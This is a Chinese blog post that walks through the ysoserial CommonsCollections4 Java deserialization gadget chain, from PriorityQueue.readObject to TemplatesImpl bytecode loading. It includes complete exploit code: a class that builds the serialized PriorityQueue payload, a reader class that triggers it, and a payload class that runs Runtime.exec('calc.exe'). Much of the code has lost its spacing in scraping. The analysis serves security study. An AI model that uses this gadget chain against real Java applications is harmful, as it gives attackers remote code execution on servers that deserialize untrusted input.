java反序列化 exp_java反序列化-ysoserial-调试分析总结篇(4)

最新推荐文章于 2023-05-26 10:03:51 发布
最新推荐文章于 2023-05-26 10:03:51 发布
阅读量138 收藏
点赞数
文章标签: java反序列化 exp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30296363/article/details/114622898
版权

1.前言

这篇文章继续分析commoncollections4利用链,这篇文章是对cc2的改造,和cc3一样,cc3是对cc1的改造,cc4则是对cc2的改造,里面chained的invoke变成了instantiateTransformer,所以不用invoke反射调用方法,所以外层queue里面放的元素随意

3aff727ed3402a870b0c93f9e6130acf.png

缩减版的函数调用栈如下图所示:

36eb8a8b5badb718641d39982c4c11d3.png

2.利用链分析:

3a24efb940676b6d134837d4e3790a56.png

调用还是从PriorityQueue.readObject函数开始

8756d44168e436d1a0a181533bf04df5.png

一直到org/apache/commons/collections4/comparators/TransformingComparator.class的compare函数中将调用chainedTransformer的transform方法了

868b4d7fe02b8fe135ce7bec5292281c.png

这里第一个要利用的还是ConstantTransformer,要返回TrAXfilter类

66b7ff5f7e00a0f731fd0a24fce96078.png

接下来第二轮将调用Traxfilter类入口参数类型为Templates的构造函数,并且实例化调用该构造函数传入templatesImpl类的实例

8f7561b3b6686a3e307ebec07ade4976.png

接下来到TraxFilter的构造函数中将调用templatesImpl.newTransformer(),就可以是实例化_bytecode中存储的类进行rce了

ae99ad2823deb3f6838fca8a54df90e0.png

yso构造分析:

ca0bbafe9499c9b1ffd4d6bcfbc1c1c7.png

首先构造一个Templates类的实例,然后开始构造chianed链需要的东西,首先就是一个Constanttransformer

69c26922ea04c359ac7f956eca9e2554.png

然后再构造chained的第二个元素就是该链相对于cc2的区别为InstantiateTransformer类

7d467452d71d265bd2fb9551c9fcbe42.png

接下来将两个transformer放进chaind,并且构造外层的PriorityQueue,并将chined放入TransformingComparator,然后再将Templates放到instantiate实例的参数和参数类型中,至此

就构造结束了

手动exp构造:

exp.java

packageCommonsCollections4;importcom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;importcom.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;import javassist.*;importorg.apache.commons.collections4.Transformer;importorg.apache.commons.collections4.comparators.ComparableComparator;importorg.apache.commons.collections4.comparators.TransformingComparator;importorg.apache.commons.collections4.functors.ChainedTransformer;importorg.apache.commons.collections4.functors.ConstantTransformer;importorg.apache.commons.collections4.functors.InstantiateTransformer;importjavax.xml.transform.Templates;importjava.io.File;importjava.io.FileOutputStream;importjava.io.IOException;importjava.io.ObjectOutputStream;importjava.lang.reflect.Field;importjava.util.PriorityQueue;public classexp {public static void main(String[] args) throwsIOException, CannotCompileException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException, NotFoundException {

TemplatesImpl tmp= newTemplatesImpl();

ClassPool pool=ClassPool.getDefault();

pool.insertClassPath(new ClassClassPath(payload.class));

CtClass pay_class= pool.get(payload.class.getName());byte[] payCode =pay_class.toBytecode();

Class clazz;

clazz=Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");//存储payload类

Field byteCode = clazz.getDeclaredField("_bytecodes");

byteCode.setAccessible(true);

byteCode.set(tmp,new byte[][]{payCode});

Field name= clazz.getDeclaredField("_name");

name.setAccessible(true);

name.set(tmp,"tr1ple");

Transformer[] trans= newTransformer[]{new ConstantTransformer(TrAXFilter.class),newInstantiateTransformer(new Class[]{Templates.class},newObject[]{tmp})

};

ChainedTransformer chian= newChainedTransformer(trans);//PriorityQueue queue = new PriorityQueue(2,new TransformingComparator(chian));

TransformingComparator transCom = newTransformingComparator(chian);

PriorityQueue queue= new PriorityQueue(2);

queue.add(1);

queue.add(1);

Field com= PriorityQueue.class.getDeclaredField("comparator");

com.setAccessible(true);

com.set(queue,transCom);//序列化

File file;

file= new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections4.ser");

ObjectOutputStream obj_out= new ObjectOutputStream(newFileOutputStream(file));

obj_out.writeObject(queue);

}

}

readobj.java

packageCommonsCollections4;import java.io.*;importjava.lang.Runtime;public classreadObj {public static void main(String[] args) throwsIOException, ClassNotFoundException {

File file;

file= new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections4.ser");

ObjectInputStream obj= new ObjectInputStream(newFileInputStream(file));

obj.readObject();

}

}

payload.java

packageCommonsCollections4;importcom.sun.org.apache.xalan.internal.xsltc.DOM;importcom.sun.org.apache.xalan.internal.xsltc.TransletException;importcom.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;importcom.sun.org.apache.xml.internal.dtm.DTMAxisIterator;importcom.sun.org.apache.xml.internal.serializer.SerializationHandler;importjava.io.IOException;public class payload extendsAbstractTranslet {

{try{

Runtime.getRuntime().exec("calc.exe");

}catch(IOException e) {

e.printStackTrace();

}

}publicpayload(){

System.out.println("tr1ple 2333");

}public void transform(DOM document, SerializationHandler[] handlers) throwsTransletException {

}public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throwsTransletException {

}

}

IGMIA
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ysomap:一个基于ysererial的有用的Java序列利用框架
05-14
YSOMAP Ysomap is A helpful Java Deserialization exploit framework based on ysoserial #1 起因 在实际分析ysoserial的利用链时,有时候会觉得框架写的太死,有以下几个缺点: 同一个利用链如果想改变一下最后的利用效果,如命令执行改成代码执行,我们需要改写这个利用链或者是重新增加一个利用链。这时,我们其实可以看到利用链的前半部分是不变的,变的只是后续的利用效果。 ysoserial仅实现了常规的序列利用链,对于类似JSON格式的序列利用链,以当前的这个框架扩展起来会比较麻烦 所以萌生了开发一个更加灵活的框架来扩展序列利用链,也就是当前这个试验品ysomap。 PS:YSOMAP项目为另一个项目的子项目,后续将开源该项目,敬请期待...... #2 原理 我将利用链切分成了两个部分payload和
Java序列终极测试工具
09-17
Java序列终极测试工具
深入分析Java序列序列
程序猿开发日志【学习永无止境】
04-28 712
序列是一种对象持久的手段。普遍应用在网络传输、RMI等场景中。本文通过分析ArrayList的序列来介绍Java序列的相关内容。主要涉及到以下几个问题: 怎么实现Java序列 为什么实现了java.io.Serializable接口才能被序列 transient的作用是什么 怎么自定义序列策略 自定义的序列策略是如何被调用的 ArrayList对序列的实现有什么
手机调试java代码_【奇技淫巧】Intellij IDEA调试ysoserial等Java项目的方法
weixin_33524659的博客
02-27 133
maven-assembly-plugin就是一个用来打包项目的插件,可以把依赖、类文件什么的都打包在一起。这里的mainClass的值是 ysoserial.GeneratePayload ,这个就是主类。根据这个配置,打开文件src/main/java/ysoserial/GeneratePayload.java,看到其中的main函数了吗,如图1。点左边的小箭头,里面有个debug,这就是调...
Java序列漏洞利用集成工具
03-22
Java序列漏洞利用集成工具
java 序列利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
java序列 ysoserial|ysoserial-master-ff59523eb6-1.jar
12-10
帮助理解java序列漏洞的工具,一般还需配套工具:SerializationDumper-v1.13、DeserLab以及抓包分析工具
java序列工具
11-21
Java序列是一种将已序列的对象状态转换回对象的过程,它是Java平台中持久数据的一种常见方式。在Java应用程序中,序列用于保存对象的状态以便稍后恢复,或者在网络间传输对象。然而,这个过程也可能引入...
java序列利用程序UI版Beta1.1.rar
07-20
如"java序列利用程序UI版Beta1.1"这样的工具,可能是为了帮助安全研究人员测试和理解序列漏洞的工作原理,通过图形用户界面(GUI)提供了一种更直观的方式来实验和分析Java序列过程。 9. **安全编程...
Java序列工具.zip
05-31
Java序列是一种将之前序列的对象状态转换回对象的过程,它是Java平台中持久数据的一种常见方法。在Java应用程序中,序列用于保存对象的状态以便稍后恢复,或者在网络传输中将对象从一个系统传输到另一个...
Java序列漏洞利用工具(全)
09-14
java序列漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以……
ysoserial序列gadget原理-part1:URLDNS/CommonsCollections1
mole_exp的博客
01-27 2715
文章目录前言URLDNS依赖payload构造gadget原理简述Groovy1依赖payload构造gadgetCommons-Beanutils1 前言 其实序列利用链分析的文章写起来没啥意思,无非就是函数调用栈的复述,序列对象(payload)的构造无非就是为了满足某条函数调用的路径而已。如果没有亲自调试过,也是看不懂别人的文章的。但好记性不如烂笔头,况且笔者记性也不是很好,所以还是来篇流水账记录一下之前的学习。 URLDNS 依赖 无 payload构造 注:ysoserial工具里说的pa
java序列 exp_java序列exp实践
weixin_34125336的博客
02-16 201
这两天很火的java序列漏洞,看到乌云大牛已经开始刷分,于是找来实践一波exp来源ysoserial其中weblogic和jenkins提供python脚本,但需自己加载payload. 而对于jboss和websphere则提供了poc的数据包.foxloveseciswinhttp://www.iswin.org/2015/11/13/Apache-CommonsCollections-D...
java序列理解_对ysoserial工具及java序列的一个阶段性理解
weixin_39615808的博客
02-24 286
经过一段时间的琢磨与思,以及重读了大量之前看不懂的序列文章,目前为止算是对java序列这块有了一个阶段性的小理解。目前为止,发送的所有java序列的漏洞中。主要需要两个触发条件:1、序列的攻击入口2、序列的pop攻击链这两个条件缺一不可。网上大量分析gadgets的文章方法,让人误以为有攻击链就可以序列。其实这块是有一定的误导性的。在我最初研究序列的时候,我觉得攻击链...
ysoserial CC5利用链分析
weixin_45805993的博客
11-16 477
前两天东华杯没打,看里面签到题用到了 BadAttributeValueExpException.做入口类似的链子,就来学习下同样用了这个类的CC5 Gadget Gadget chain: ObjectInputStream.readObject() BadAttributeValueExpException.readObject() TiedMapEntry.toString() LazyMap.get()
Java序列漏洞(ysoserial工具使用、shiro序列利用)
最新发布
qq_50854662的博客
05-26 1804
Java序列漏洞(ysoserial工具使用、shiro序列利用)
序列工具ysoserial使用介绍
热门推荐
weixin_34275734的博客
08-10 2万+
序列工具ysoserial使用介绍 0x00 ysoserial是什么? ysoserial集合了各种java序列payload;下载地址:https://github.com/angelwhu/ysoserial 0x01 基本使用方法 在公网vps上执行: java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit....
ysoserial-cc1 java序列
springgold的博客
09-01 328
yso-cc1 1. 从入口看 1)run方法 2)回到类的getobject 3)生成 transformer 射链和lazymap对象 4)代理对象创建 使用代理实现类(AnnotationInvocationHandler) 5)返回代理类,射ChainedTransformer的iTransformers属性赋值transformers(射链) 6)返回AnnotationInvocationHandler 对象 7)序列 8)所以入口就在AnnotationInvocation
java代码审计之CC1链(一)
st3pby的博客
02-20 3770
InvokerTransformerCC1链的漏洞点位于InvokerTransformer.class中射加载参数可控那么只需要调用到这个点,就可以触发漏洞,可以参考ysoserial中的CC1利用ysoserial中的CC1链,是使用LazyMap构造的,LazyMap构造的整条攻击路径为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值